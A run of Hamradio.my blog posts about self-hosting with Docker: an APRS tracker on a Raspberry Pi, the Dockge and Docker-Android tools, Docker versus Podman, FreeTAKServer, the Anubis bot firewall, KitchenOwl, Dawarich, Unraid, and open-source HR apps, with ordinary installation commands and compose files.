Amateur radio enthusiasts have long been using APRS (Automatic Packet Reporting System) to track mobile stations, send messages, and share telemetry over RF and the internet. Traditionally, building an APRS tracker has required a fair bit of wiring, configuration, and standalone software installation. However, thanks to the work of the open source community—particularly the sdr-enthusiasts/docker-aprs-tracker project—it’s now possible to deploy a self-contained APRS tracker inside a Docker container.

This raises an interesting question: could we build a compact, mobile APRS tracker using a Raspberry Pi and this containerized setup? While I haven’t personally tested this combination yet, I believe the idea holds real promise and is worth exploring.

The Project: docker-aprs-tracker

The docker-aprs-tracker project packages Direwolf (a software TNC), GPSD (for GPS data input), and Chrony (for system time synchronization) into a Docker container. It’s designed to be run on a minimal Linux environment and supports ARM architectures, including Raspberry Pi models (such as the 3B+, 4B, and even some alternatives like LePotato). This makes it an ideal candidate for Raspberry Pi deployments.

Why Raspberry Pi?

The Raspberry Pi is a perfect fit for this kind of project due to its low power consumption, small size, and ARM64 compatibility. When paired with a USB GPS module, a USB sound card, and a Baofeng radio (or any HT that supports audio input/output), it has the potential to become a fully functional APRS tracker with digipeater capability.

Here’s the rough concept:

• Raspberry Pi (DietPi or Raspberry Pi OS Lite): Lightweight Linux OS, running headless.
• USB GPS module: Feeds GPS coordinates to the container via GPSD.
• USB sound card: Acts as the audio interface to the radio.
• Baofeng UV-5R: Transmits and receives APRS signals.
• Direwolf inside Docker: Handles AX.25 packet encoding/decoding and beaconing.

Key Advantages

• Portability: Everything runs on a Pi, powered by USB or battery.
• Simplicity: Containerized deployment reduces the mess of dependencies.
• Modularity: You can easily swap out hardware components.
• Maintainability: Configuration is stored in a version-controlled docker-compose.yml.

Points to Consider

This project is still under active development, and the container is described as “low maturity,” meaning bugs and frequent changes should be expected. For experimental or personal use, this isn’t a deal-breaker. In fact, it can be a great learning opportunity.

Also, tuning the audio interface can be tricky—especially if you’re using a VOX-based cable like the BTech APRS-K1. The creator of the project recommends a CM108-based USB sound card with built-in PTT support for more reliable transmission. There’s even mention of pre-built options from na6d.com that combine everything in a compact form.

Final Thoughts

While I haven’t built this setup yet, the combination of Docker, Direwolf, and Raspberry Pi opens the door for a lightweight, portable APRS tracker that could be deployed in a vehicle, on a hiking trip, or even at a public service event. It’s an idea I believe many radio amateurs will find interesting—especially those already comfortable working with Raspberry Pi and containerized applications.

If you’re looking for your next ham radio project, this might just be it. And if you do build it, I’d love to hear how it works out for you. Visit and learn more at https://github.com/sdr-enthusiasts/docker-aprs-tracker

The post Building an APRS Tracker with Raspberry Pi appeared on Hamradio.my - Amateur Radio, Tech Insights and Product Reviews by 9M2PJU.

If you’ve ever felt overwhelmed managing multiple Docker stacks or wanted a more intuitive interface than raw CLI commands—Dockge might be your new favorite tool.

Dockge is a modern, elegant, and fully self-hosted manager built specifically for docker-compose users. It’s designed for those who want power and simplicity in a single place, without losing control over their YAML files or containers.

What Makes Dockge Special?

Unlike some heavier solutions, Dockge sticks to doing one thing—and does it really well: managing your compose.yaml stacks. Whether you’re starting, stopping, editing, or updating services, Dockge keeps it real-time and responsive.

Here’s what you get out of the box:

• Create, edit, start, stop, and delete your Docker stacks from a single UI.
• Update Docker images with just a few clicks.
• Interactive YAML editor for hands-on control.
• Built-in Web Terminal for direct command-line access.
• Multiple Agent Support to manage stacks across different hosts (since v1.4.0).
• Convert docker run commands into Compose YAML in seconds.
• File-based management — Dockge never hijacks your files; they’re still on disk and usable via CLI.

It’s reactive, lightweight, and honestly—kind of fun to use. Think Uptime Kuma, but for Docker Compose.

Easy Installation with Docker

Getting started with Dockge is straightforward:

# Create folders for stacks and Dockge's own files
mkdir -p /opt/stacks /opt/dockge
cd /opt/dockge

# Download the default compose.yaml
curl https://raw.githubusercontent.com/louislam/dockge/master/compose.yaml --output compose.yaml

# Start it up
docker compose up -d

Access it via your browser at http://localhost:5001, and you’re good to go!

You can also generate a custom compose.yaml file with your preferred port and stack directory via the interactive generator here: dockge.kuma.pet

Why Dockge Exists

The developer behind Dockge originally used Portainer but wanted something snappier and more focused on stacks. Dockge doesn’t try to replace Portainer entirely—it just makes managing Docker Compose setups smoother and less frustrating.

If all your infrastructure is compose.yaml-driven, Dockge is likely the best fit. But if you need to juggle volumes, networks, or standalone containers, keeping Portainer around might still be helpful.

Use Cases and Compatibility

Dockge is a great fit if:

• You’re self-hosting multiple services with Docker Compose.
• You like visual feedback and responsive interfaces.
• You want fine control without bloated features.

Supported OS and platforms include:

• Ubuntu / Debian Bullseye+ / Raspbian Bullseye+
• CentOS, Fedora, Arch
• Not yet supported on Windows
• Architectures: armv7, arm64, amd64

Updating Dockge

Updating is easy too:

cd /opt/dockge
docker compose pull && docker compose up -d

Just like that, you’re on the latest version.

Whether you’re a seasoned homelabber or just getting started with Docker, Dockge brings clarity and simplicity to Compose stack management. The UI is gorgeous, performance is fast, and setup is a breeze. You’ll wonder why you didn’t use it sooner.

Explore the GitHub repo: github.com/louislam/dockge
Watch the overview video: Dockge Demo

Bonus: Frequently Asked Questions

• Can I use Dockge with Portainer? Yes, they can run side-by-side.
• Can I manage existing stacks? Absolutely—just move your YAML files into /opt/stacks/<stack-name>/compose.yaml and click Scan Stacks Folder.
• Does it support single container management? Not directly—Dockge is purpose-built for Compose.

Final Thoughts

Dockge is a powerful tool that does one thing extremely well: give you full visual control of your Docker Compose stacks. It doesn’t try to be everything—and that’s what makes it great.

The post Dockge: A Sleek, Self-Hosted Docker Stack Manager for Compose Lovers appeared on Hamradio.my - Amateur Radio, Tech Insights and Product Reviews by 9M2PJU.

Need a flexible and scalable Android emulator for development, testing, or CI pipelines? Docker-Android offers a containerized solution that runs Android emulators with various device profiles, VNC support, and ADB access — all inside Docker.

Why Use Docker-Android?

Docker-Android simplifies emulator setup, especially in CI environments or when testing multiple device configurations. Key benefits include:

• Emulator Skins & Profiles – Samsung Galaxy S10, Nexus 5, Pixel C, and more.
• VNC Access – View and control the emulator via your browser.
• Log Sharing – Access logs via a built-in web UI.
• ADB Support – Connect to the emulator via adb connect.
• Framework Integration – Works with Appium, Espresso, and other test frameworks.
• Cloud Ready – Integrates with Genymotion Cloud, AWS, GCP, etc.
• UI Testing – Run unit and UI tests in isolated containers.

Available Docker Images

You can pull images by Android version or specific release version. Examples:

Supported Devices

Docker-Android includes emulator profiles for a wide range of phones and tablets:

Phones

• Samsung Galaxy S10 / S9 / S8 / S7 / S6
• Nexus One / S / 4 / 5

Tablets

• Nexus 7
• Pixel C

Requirements

• Docker installed on your system
• Ubuntu host OS (natively or via VM for macOS/Windows users)
• Virtualization support (KVM)

To check if virtualization is enabled:

sudo apt install cpu-checker
kvm-ok

Quick Start

Run a Docker-Android container with Samsung Galaxy S10 and Android 11:

docker run -d -p 6080:6080 \
  -e EMULATOR_DEVICE="Samsung Galaxy S10" \
  -e WEB_VNC=true \
  --device /dev/kvm \
  --name android-container \
  budtmo/docker-android:emulator_11.0

Now, open your browser and go to:

http://localhost:6080

To check emulator status:

docker exec -it android-container cat device_status

Persisting Emulator Data

By default, emulator data is not saved. To persist data across container restarts:

docker run -v data:/home/androidusr \
  budtmo/docker-android:emulator_11.0

Use-Cases

Docker-Android is ideal for:

• Building Android projects
• Automated UI testing (Appium, Espresso)
• ADB control and automation
• Cloud deployment (Azure, AWS, GCP)
• Jenkins & CI pipelines
• SMS simulation

Advanced Integrations

Genymotion SAAS

If you need more powerful cloud infrastructure or want to run multiple emulator types, Docker-Android supports integration with Genymotion SAAS and popular cloud platforms like:

• AWS
• GCP
• Alibaba Cloud

About Docker-Android Pro

For more advanced use-cases, there’s a Docker-Android Pro version available for sponsors. It unlocks:

Feature	Free	Pro
Analytics-free
Proxy Support
Language Setting
Newer Android Versions
Root Privileges
Headless Mode
Selenium 4 Integration
Multiple Simulators		(coming soon)
Google Play Store		(coming soon)
Video Recording		(coming soon)

Final Thoughts

Docker-Android is a powerful way to simulate Android devices on any infrastructure that supports Docker. Whether you’re a mobile developer, QA engineer, or DevOps specialist, this project helps bring scalable Android testing and development to your local machine or CI/CD pipelines.

For more details, check out the GitHub repository:
https://github.com/budtmo/docker-android

The post Run Android Emulators in Docker with Ease Using Docker-Android appeared on Hamradio.my - Amateur Radio, Tech Insights and Product Reviews by 9M2PJU.

In the fast-evolving world of software containers, two titans stand at the forefront: Docker and Podman. Both tools aim to simplify container management, but they differ significantly in design, architecture, security, and philosophy. If you’re a developer, sysadmin, or DevOps enthusiast, choosing the right tool could impact your workflows, security posture, and deployment pipelines.

Let’s dive deep into the real, factual differences between Docker and Podman—no fluff, just facts.

What Are Docker and Podman?

Docker

Released in 2013, Docker revolutionized how developers package and ship applications. It introduced a high-level, developer-friendly interface for containerizing applications and quickly became the standard in CI/CD pipelines and cloud-native development.

• Architecture: Daemon-based (dockerd)
• License: Apache 2.0 (Engine), Docker Desktop (commercial license for enterprises)
• Adoption: Widely used in enterprises and supported across all major cloud providers

Podman

Podman (short for Pod Manager) emerged from the Red Hat ecosystem in 2018 as a modern, daemonless, rootless, and Kubernetes-native alternative to Docker. It’s a drop-in replacement for many Docker CLI commands but with a twist: better security and system integration.

• Architecture: Daemonless, fork/exec model
• License: Apache 2.0
• Endorsed by: Red Hat, Fedora, and used in OpenShift

Architecture: Daemon vs Daemonless

Docker

Docker uses a centralized daemon (dockerd) that listens for commands from the Docker CLI. All containers run as subprocesses of this daemon, which must be started and kept running in the background.

• Pros: Easier to manage containers centrally
• Cons: If the daemon crashes, all containers go down. Also, the daemon typically runs with root privileges, a security concern in multi-tenant environments.

Podman

Podman is daemonless. Each container is a direct child process of the Podman CLI, eliminating the single point of failure and reducing complexity.

• Pros: More secure, no need for a background service
• Cons: Slightly more complex to manage container orchestration manually (but easily fixed with systemd)

Security: Rootless by Default

Docker

Docker runs the daemon as root by default. While Docker introduced a rootless mode, it’s not the standard, and setting it up requires additional configuration.

This model has led to security breaches in containerized environments when untrusted containers were exploited to escalate privileges.

Podman

Podman was built with security first. It runs containers as the current user, even allowing completely rootless containers with no special setup. This significantly reduces the attack surface and aligns better with multi-user Linux environments.

Rootless Podman containers can’t access host kernel features they shouldn’t, which is excellent for sandboxing.

Compatibility and CLI

One of Podman’s biggest strengths is its Docker CLI compatibility.

docker run -it alpine sh
# is identical to
podman run -it alpine sh

• Podman supports nearly all Docker CLI commands.
• Even podman-compose (a replacement for docker-compose) is available.
• Transitioning from Docker to Podman is usually as simple as replacing the word “docker” with “podman.”

Systemd Integration

Podman integrates directly with systemd, allowing you to manage containers as system services without writing complex unit files manually.

podman generate systemd --name myapp > ~/.config/systemd/user/myapp.service

With this, containers can:

• Auto-start on boot
• Restart on failure
• Be managed like native Linux services

Docker can do this too—but only with extra configuration or third-party wrappers.

Pod Support: Kubernetes-Ready

Docker

• No native support for pods
• Multi-container apps must be managed with Docker Compose

Podman

• Supports pods natively, just like Kubernetes
• You can run multiple containers sharing the same network and IPC namespace—perfect for mimicking Kubernetes locally

podman pod create --name webpod
podman run --pod webpod nginx
podman run --pod webpod redis

You’re essentially spinning up a Kubernetes-like environment on your laptop.

Performance

• Startup Speed: Podman starts containers slightly faster, especially in rootless mode, since there’s no daemon overhead.
• System Resources: Podman consumes fewer resources due to its daemonless architecture.
• Stability: If Docker’s daemon fails, all containers die. Podman avoids this problem.

Tooling and Ecosystem

Docker

• Has a mature, vast ecosystem
• Seamless integration with CI/CD tools, IDEs, and Kubernetes
• Rich GUI with Docker Desktop

Podman

• Lighter, CLI-focused tooling
• Supported by Buildah (for building images), Skopeo (for image management), and Podman Compose
• No official GUI, but Cockpit and third-party tools exist

Licensing

When to Use What?

Choose Docker if:

You’re working in a team already standardized on Docker
You need Docker Desktop’s GUI or Compose integration
You rely on third-party tools that only support Docker

Choose Podman if:

You prioritize security and want rootless containers
You want systemd integration for persistent services
You’re running on Red Hat, Fedora, or Debian-based servers
You want better Kubernetes alignment with pods

Final Verdict

Feature	Docker	Podman
Daemon	Required	Not required
Rootless	Optional	Default
Pod Support
systemd Integration	Limited	Native
Kubernetes Alignment	Moderate	High
GUI Tools	(Docker Desktop)	(CLI-centric)
Licensing for Desktop	Paid for some	Fully open source

Bottom line: Podman is a modern, security-focused, daemonless alternative to Docker. It’s perfect for developers and sysadmins who want Kubernetes-native behaviors and rootless containerization. Docker, however, remains unmatched in terms of ecosystem maturity and toolchain support.

Sources

• Red Hat Developer
• Podman Official Docs
• Docker Docs
• Spacelift Blog
• Last9 Engineering
• BetterStack Guides

The post Docker vs Podman: The Showdown in Containerization appeared on Hamradio.my - Amateur Radio, Tech Insights and Product Reviews by 9M2PJU.

In the world of amateur radio, situational awareness and efficient communication are paramount. Enter FreeTAKServer (FTS), an open-source implementation of a Tactical Awareness Kit (TAK) server, designed to facilitate real-time data sharing and coordination among teams. Originally developed for military applications, FTS has found its way into civilian use, including amateur radio operations.

This guide will walk you through installing FreeTAKServer using Docker, a containerization platform that simplifies deployment and management of applications.

Official docs: FreeTAKServer Docker Setup

What You’ll Need

• A Linux server (preferred — Ubuntu, Debian, Fedora, etc.)
• Docker or Podman installed

Step 1: Choose Your Container Runtime

FreeTAKServer works with both Docker and Podman.

Check what’s installed:

docker --version
podman --version

Important: Pick one and stick with it for the whole setup.

Step 2: Create a Folder

Make a folder to keep everything organized:

mkdir ~/freetakserver
cd ~/freetakserver

Step 3: Get the Compose File

FreeTAKServer provides a pre-made file to launch everything easily.

Download it:

wget https://raw.githubusercontent.com/FreeTAKTeam/FreeTAKHub-Installation/refs/heads/main/containers/example-compose.yaml -O compose.yaml

Open it in your text editor:

nano compose.yaml

Look for a line like this:

FTS_IP: YOUR EXTERNAL URL HERE

Replace it with your server’s external IP address or domain name. Example:

FTS_IP: 123.45.67.89

Save and close.

Step 4: Start the Server

Now run the services in the background:

With Docker:

docker compose -f compose.yaml up -d

With Podman:

podman-compose -f compose.yaml up -d

Step 5: Check the Logs

Want to see if it’s working?

docker logs freetakserver
docker logs freetakserver-ui

Or with Podman:

podman logs freetakserver
podman logs freetakserver-ui

Step 6: Stop the Server

When you’re done or want to update:

docker compose -f compose.yaml down

Or:

podman-compose -f compose.yaml down

Where’s My Data Stored?

All your important FreeTAKServer data lives inside a Docker volume.

To find where it’s stored:

docker inspect freetakserver_free-tak-core-db

Look for the Mountpoint — that’s the full path to your data.

Example: /var/lib/docker/volumes/freetakserver_free-tak-core-db/_data

Ports to Know

The server uses default FreeTAKServer ports, but you can customize them with environment variables in the compose.yaml if needed.

Extra Settings (Optional)

Here are some useful environment variables:

Summary

• Simple Docker-based install
• Works on Linux with Docker or Podman
• Data is stored persistently using volumes
• UI and API included

Need Help?

Check the official FreeTAKServer Docker guide here:
https://freetakteam.github.io/FreeTAKServer-User-Docs/Installation/mechanism/Docker/overview/

The post How to Install FreeTAKServer Using Docker appeared on Hamradio.my - Amateur Radio, Tech Insights and Product Reviews by 9M2PJU.

The internet today is crawling with bots—some helpful, most not. Whether it’s AI scrapers harvesting public data or malicious bots launching DDoS attacks, websites are under constant pressure to defend their content. Enter Anubis: a clever, open-source web firewall that uses Proof-of-Work (PoW) to filter out bots while letting real users through with minimal friction.

Let’s unpack how it works—and how to deploy it with Docker and Nginx.

What Is Anubis?

At its core, Anubis is a PoW gateway. It sits in front of your website and challenges each visitor with a lightweight computational puzzle before letting them through.

The concept is simple but effective: bots that don’t execute JavaScript (like most scrapers or AI crawlers) can’t pass the challenge. Even those that do will find it expensive to scale.

How It Works (Step by Step)

Here’s what happens when someone visits a site protected by Anubis:

1. User requests a page.
2. Anubis intercepts the request as a reverse proxy.
3. It serves a small HTML page with embedded JavaScript containing a Proof-of-Work challenge.
4. Browser solves the challenge in a second or two, generating a token.
5. The browser resubmits the request with the token, and Anubis lets them through.

This slows down bots significantly while being nearly invisible to human users.

Why It Works

Bots and crawlers typically skip JavaScript. That means:

• They can’t pass the PoW challenge.
• Even if they try, solving the challenge repeatedly becomes computationally expensive.

For humans: it’s just a couple of seconds. For bots: it’s a serious headache.

Real-World Adoption

Anubis is already being used by high-traffic, open-source projects like:

• Arch Wiki
• GNOME
• WineHQ
• FFmpeg
• UNESCO

These communities needed something robust, lightweight, and self-hosted. Anubis delivered.

Quick Start with Docker

Anubis is available as a Docker image at:

ghcr.io/techarohq/anubis

Available Tags

Docker Compose Example

Here’s a quick way to run Anubis using Docker Compose:

services:
  anubis:
    image: ghcr.io/techarohq/anubis:latest
    container_name: anubis
    restart: unless-stopped
    ports:
      - "8080:8080" # Anubis listens on port 8080 by default
    volumes:
      - ./config:/etc/anubis
    environment:
      - ANUBIS_CONFIG=/etc/anubis/anubis.toml
    user: "1000:1000"

Important: Make sure the mounted ./config directory is owned by UID/GID 1000, or is writable by that user.

System Requirements

Anubis is very efficient:

• ~128MiB RAM is enough for many use cases.
• Ideal for HTTP traffic.
• May not be suited for long-lived connections like WebSockets (TBD in real-world use).

Nginx Reverse Proxy Config

Once Anubis is running, you’ll want to route traffic through it. Here’s a basic Nginx config to pass requests through Anubis and then upstream to your real site:

server {
    listen 80;
    server_name yoursite.com;

    location / {
        proxy_pass http://localhost:8080;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    }
}

You can also put Anubis in front of another reverse proxy (like Nginx ➜ Anubis ➜ App), depending on your network layout.

Why Choose Anubis?

• Open-source and fully self-hostable
• No CAPTCHAs, no third-party cloud services
• Blocks scrapers and AI bots reliably
• Works great with Docker, Nginx, and minimal hardware
• Community-tested and battle-hardened

Final Thoughts

In an age of aggressive AI scraping and relentless bots, Anubis offers a refreshingly simple and effective shield. By making abuse computationally expensive and annoying for bots—but nearly invisible to humans—Anubis flips the script and puts the burden back where it belongs.

You can try a live demo at anubis.techaro.lol or start deploying right away using the official GitHub repo.

The post How Anubis Works: Fighting Bots with Proof-of-Work appeared on Hamradio.my - Amateur Radio, Tech Insights and Product Reviews by 9M2PJU.

Managing your kitchen just got a lot easier! KitchenOwl is a modern, open-source, self-hosted solution for handling grocery lists, recipes, meal planning, and even tracking household expenses — all from one sleek and user-friendly interface. Whether you’re managing meals for yourself or your entire family, KitchenOwl gives you full control with privacy and collaboration at its core.

Key Features

• Grocery List Manager
  Categorized grocery lists with icons and quantities help you shop faster and smarter.
• Recipe Organizer
  Save, edit, and categorize your favorite recipes. You can even add ingredients from a recipe directly into your grocery list.
• Meal Planning
  Plan meals for the week with ease and link recipes to your calendar for a smoother kitchen workflow.
• Expense Tracker
  Track how much you spend on groceries and view expenses per shopping trip.
• Multi-User Support
  Perfect for households — everyone can share access to lists, plans, and recipes in real time.
• Cross-Platform Access
  Use it on any web browser or mobile device. KitchenOwl supports Android, iOS (via TestFlight), and has a web interface for desktops.

How to Self-Host KitchenOwl Using Docker

Hosting KitchenOwl on your own server or VPS gives you full control over your data. Here’s how to do it in just a few steps:

Prerequisites

• A Linux server (can be local or cloud-hosted)
• Docker & Docker Compose installed
• Basic terminal knowledge

Step 1: Create Docker Compose File

Create a new file called docker-compose.yml:

version: "3"
services:
  front:
    image: tombursch/kitchenowl-web:latest
    restart: unless-stopped
    ports:
      - "80:80"
    depends_on:
      - back
  back:
    image: tombursch/kitchenowl-backend:latest
    restart: unless-stopped
    environment:
      - JWT_SECRET_KEY=PLEASE_CHANGE_ME
    volumes:
      - kitchenowl_data:/data

volumes:
  kitchenowl_data:

Important: Replace PLEASE_CHANGE_ME with a secure, random string to act as your JWT secret key.

Step 2: Start the Service

Run the following command in your terminal where the file is located:

docker-compose up -d

This will download the necessary images and start KitchenOwl as a background service.

Step 3: Open in Browser

After setup is complete, visit:

http://localhost

If you’re using a remote server, replace localhost with your server’s IP address or domain name.

Access Anywhere

KitchenOwl is cross-platform:

• Web: Use it in any modern browser
• Android: Available via Google Play and F-Droid
• iOS: Access through Apple TestFlight
• Desktop: Use the browser or wrap in Electron for a native feel

Why Self-Host?

Self-hosting KitchenOwl ensures that your personal data stays private, free from third-party tracking or restrictions. With multi-user support, it’s perfect for families or shared homes.

• Own your data
• Customize it to your needs
• No subscription fees
• Access anytime, anywhere

Final Thoughts

KitchenOwl is more than just a grocery app — it’s a full-featured kitchen assistant designed with privacy, usability, and flexibility in mind. Whether you’re a techie who loves Docker or someone just looking to simplify kitchen life, KitchenOwl is a brilliant tool to have.

The post KitchenOwl: Your Self-Hosted Grocery List and Recipe Manager appeared on Hamradio.my - Amateur Radio, Tech Insights and Product Reviews by 9M2PJU.

In an era where data privacy is paramount, Dawarich emerges as a powerful, self-hosted alternative to Google Location History. Designed for individuals who value control over their personal data, Dawarich allows you to visualize, analyze, and manage your location history without relying on third-party services.

Key Features

• Interactive Map Visualization: View your location data on an interactive map with customizable layers, including heatmaps, points, and travel lines.
• Comprehensive Statistics: Gain insights into your travel history, such as the number of countries and cities visited, total distance traveled, and time spent in various locations.
• Trip Management: Create and manage trips to see routes, distances, and durations, and add notes or photos to enrich your travel logs.
• Data Import & Export: Easily import data from sources like Google Maps Timeline, OwnTracks, Strava, and GPX/GeoJSON files, and export your data in GeoJSON or GPX formats.
• Privacy-Focused: By self-hosting Dawarich, you ensure that your location data remains private and under your control.

Self-Hosting Dawarich: A Step-by-Step Guide

Setting up Dawarich on your own server is straightforward. Here’s how you can do it using Docker:

Prerequisites

• A server or local machine with Docker and Docker Compose installed.
• Basic knowledge of command-line operations.

Installation Steps

1. Clone the Dawarich Repository

Open your terminal and execute:

git clone https://github.com/Freika/dawarich.git
cd dawarich

2. Start the Application Using Docker Compose

Run the following command to start Dawarich:

docker compose up -d

This command will build and start the necessary Docker containers.

3. Access Dawarich

Once the containers are running, open your web browser and navigate to:

http://localhost:3000

You’ll be greeted with the Dawarich interface, ready for configuration and use.

Why Choose Dawarich?

• Data Ownership: Keep your location data private by hosting it on your own infrastructure.
• Customization: Tailor the application to fit your specific needs and preferences.
• Integration: Combine Dawarich with other self-hosted tools for a comprehensive personal data management system.

Get Started Today

Empower yourself with complete control over your location history. Set up Dawarich and take the first step towards a more private and personalized data experience.

The post Dawarich: Take Control of Your Location History appeared on Hamradio.my - Amateur Radio, Tech Insights and Product Reviews by 9M2PJU.

Unraid is a powerful, Linux-based operating system that lets you build your own custom Network Attached Storage (NAS), Virtual Machine Host, and Docker Application Server—all in one box.

Unlike traditional RAID or hypervisor setups, Unraid focuses on simplicity, flexibility, and modularity, making it a favorite among home lab enthusiasts, media hoarders, self-hosters, and even small businesses.

So how does Unraid work under the hood?

1. Unraid Is Not “RAID”—It’s Better for Mixed Drives

Despite its name, Unraid doesn’t use traditional RAID (like RAID 5 or 6). Instead, it uses a unique hybrid model based on:

• Individual disk volumes (each formatted with XFS or Btrfs)
• One or two parity disks for recovery
• No striping or data distribution

This means:

• You can mix and match any size drives.
• You can pull a disk and access its contents directly.
• Only the parity disk(s) must be equal to or larger than the largest data disk.
• Drives spin up only when accessed—saving energy.

Example:

If you have 4 drives:

• 3× data disks (e.g., 4TB, 6TB, 10TB)
• 1× parity disk (10TB)

Your array has 20TB usable storage with fault tolerance for 1 disk failure.

2. The Array and Parity System

Unraid manages storage using an Array:

• Each disk is formatted independently (no block-level striping).
• The parity disk stores checksums to allow for single-disk recovery.
• You can add or remove disks without reformatting the entire array.

There’s also a cache pool (usually SSDs) to:

• Speed up writes (files are written to cache first, then moved to the array later)
• Run virtual machines or Docker containers with high IOPS
• Minimize spin-up delays on HDDs

3. User Shares: Logical Storage Abstraction

Unraid lets you create User Shares, which are folders that span across multiple physical disks.

For example:

• /mnt/user/media might pull data from disk1, disk3, and disk5
• You can configure how files are distributed: most-free, high-water, fill-up
• Exclude/include specific disks per share

This gives the appearance of a single large folder while keeping physical separation intact.

4. Docker Container Management

Unraid includes built-in Docker support with a GUI to:

• Pull images from Docker Hub or custom registries
• Define volumes and port mappings
• Automatically update containers
• Use templates from the Community Applications plugin

Docker runs atop a Btrfs-formatted cache pool, so containers benefit from fast SSD speeds.

Popular self-hosted apps include:

• Plex, Jellyfin
• Nextcloud
• Pi-hole
• Home Assistant
• Nginx Proxy Manager

5. Virtual Machines (VMs)

Unraid includes a built-in KVM hypervisor, allowing you to run full operating systems like:

• Windows 10/11
• Ubuntu
• macOS (with tweaks)
• Other Linux distros

Features:

• Web-based VM manager
• Passthrough support for GPUs, USB controllers, NICs (via IOMMU/VT-d)
• Virtual disk and ISO management
• VNC remote access

With proper hardware, you can even game on a VM using GPU passthrough.

6. Flash Boot, License, and Security

• Boots from USB (persistent license key tied to the USB drive)
• Runs in RAM after booting, keeping system fast and stateless
• GUI accessible via web browser on port 80
• Plugins available for additional monitoring, security, or customization

Licensing tiers are based on the number of attached storage devices:

• Basic: up to 6 devices
• Plus: up to 12 devices
• Pro: unlimited devices

7. Recovery, Snapshots, and Parity Limitations

• You can recover data from individual disks even outside of Unraid, since they use standard filesystems.
• Unraid doesn’t support bitrot protection or multiple-disk failures unless you configure a second parity disk.
• No ZFS support out-of-the-box, but Btrfs cache pools do allow snapshots and checksumming.

Why Unraid?

• Easier than FreeNAS/TrueNAS
• No storage rebalancing or reformatting required
• Efficient for mixed disks
• Great for self-hosted apps
• Flexible VM support
• Extremely beginner-friendly web UI

Final Thoughts

Unraid strikes a balance between simplicity and power. It’s ideal for users who want a robust home server with storage, Docker, and VMs—all manageable through a friendly web interface.

Whether you’re running a media server, building a homelab, or hosting production apps on a budget, Unraid gives you control, flexibility, and peace of mind.

The post How Unraid Works: The Flexible OS for NAS, VMs, and Docker at Home appeared on Hamradio.my - Amateur Radio, Tech Insights and Product Reviews by 9M2PJU.

When it comes to managing people, spreadsheets eventually fall apart. Whether you’re a small startup, a non-profit, or just a tech-savvy HR manager tired of SaaS subscriptions, you’ve probably thought:

“Can I just self-host my own HR app?”

Yes, you can. And if you’re anything like me, that means Docker is non-negotiable. You want fast deployment, simple updates, container isolation, and most importantly, full control of your data.

But here’s the catch: not all open-source HR systems are Docker-ready, and many are clunky, outdated, or abandoned. So I did the dirty work: tested the top contenders, spun up containers, broke a few things, and came away with clear winners and losers.

Odoo (Community Edition): Best All-Rounder for Docker + HR

Website: https://www.odoo.com
HR Module Overview: https://www.odoo.com/page/human-resources
Official Docker Image: https://hub.docker.com/_/odoo

If you only read this far: Odoo is the one. Hands down.

Odoo is an ERP system. That usually scares people — they think it’s too big, too bloated, too enterprisey. But here’s the thing: Odoo is modular, and the Community Edition is free and completely open-source. You can start with just HR modules and ignore the rest. Later on, you can add CRM, invoicing, accounting, and more — if you need them.

Why Odoo rocks:

• Clean, modern web interface
• HR features are well-built: employee records, contracts, leave, attendance, appraisals, timesheets, and basic recruitment
• Official Docker image means no hacks or 10-year-old community images
• Big ecosystem — plugins, docs, community support

What to watch out for:

• Built-in payroll only exists in third-party modules or the paid Enterprise edition
• Requires PostgreSQL as a backend (easy with Docker Compose, though)

Real-world Docker setup:

version: '3'

services:
  db:
    image: postgres:15
    environment:
      POSTGRES_DB: odoo
      POSTGRES_USER: odoo
      POSTGRES_PASSWORD: odoo

  odoo:
    image: odoo:16
    ports:
      - "8069:8069"
    depends_on:
      - db
    environment:
      HOST: db
      USER: odoo
      PASSWORD: odoo
    volumes:
      - odoo-data:/var/lib/odoo

volumes:
  odoo-data:

Just docker compose up -d, go to http://localhost:8069, and you’re in business.

ERPNext: Full-Featured HR + Payroll

Website: https://erpnext.com
GitHub: https://github.com/frappe/frappe_docker

ERPNext is what you get when you take accounting seriously. It was born as an ERP, but its HR module is surprisingly deep, and it’s one of the few with built-in payroll, which Odoo lacks in its free edition.

It covers everything from:

• Recruitment & onboarding
• Employee lifecycle
• Appraisals & KPIs
• Salary slips & payroll
• Leave, attendance, and shift planning

Why ERPNext is powerful:

• Built-in payroll engine with salary structures and tax calculations
• Fully open-source and active development
• Docker support via frappe_docker is well-documented

Downsides:

• Much harder to install than Odoo
• Requires familiarity with the Frappe framework
• You’ll be dealing with a more complex Docker Compose stack (Redis, MariaDB, etc.)

This is for you if:

• You’re comfortable with complex Docker setups
• You need serious payroll functionality without paying for a SaaS

ICE Hrm: Quick, Lightweight HR in a Box

Website: https://icehrm.com
Docker Image: https://hub.docker.com/r/gamonoid/icehrm

ICE Hrm is the fastest one to get up and running. It’s a traditional LAMP stack (PHP + MySQL), but the devs provide a Docker image, and it actually works out of the box.

It’s great for:

• Small teams
• NGOs
• Freelancers with a couple of contractors

You get:

• Employee directory
• Leave tracking
• Attendance (even with GPS support)
• Time tracking
• Document uploads

Limitations:

• The free version is limited — no advanced payroll, no performance modules
• UI is clean but not as polished as Odoo
• Docker image is community-maintained (but mostly stable)

Still, if you want to spin something up in 2 minutes and track employee leave without paying a dime, this is it.

OrangeHRM: Popular, But Not Docker-First

Website: https://www.orangehrm.com
GitHub: https://github.com/orangehrm/orangehrm

OrangeHRM is the first open-source HR app many people find. And on paper, it’s solid:

• Employee management
• Leave management
• Recruitment module
• Admin roles and permissions

But here’s the problem: Docker support is missing. No official image. No easy way to containerize it. You’ll have to DIY with Apache, PHP configs, and maybe even wrestle with mod_rewrite.

If you’re already running a LAMP stack manually, you might like it. Otherwise, skip it and save yourself the pain.

Summary Table

Feature / App	Odoo	ERPNext	ICE Hrm	OrangeHRM
Docker Ready	Official	Official	Community	Manual Only
HR Features
Payroll	(3rd-party)	Built-in	Basic	(Enterprise)
Recruitment
UI/UX	Modern	Clean	Simple	Outdated
Complexity	Moderate	High	Easy	Manual Setup
Best For	Most teams	Full HR+Finance	Small setups	LAMP fans

Final Thoughts

If I had to choose just one open-source HR system to self-host in Docker, Odoo would be it — no contest.

It’s powerful, modern, Docker-ready, and backed by a massive community. Even if you only use the HR modules, you’re already ahead. And if you ever want to grow into CRM, eCommerce, or Accounting, it’s all there.

The post Best Open Source HR Apps for Self-Hosting appeared on Hamradio.my - Amateur Radio, Tech Insights and Product Reviews by 9M2PJU.

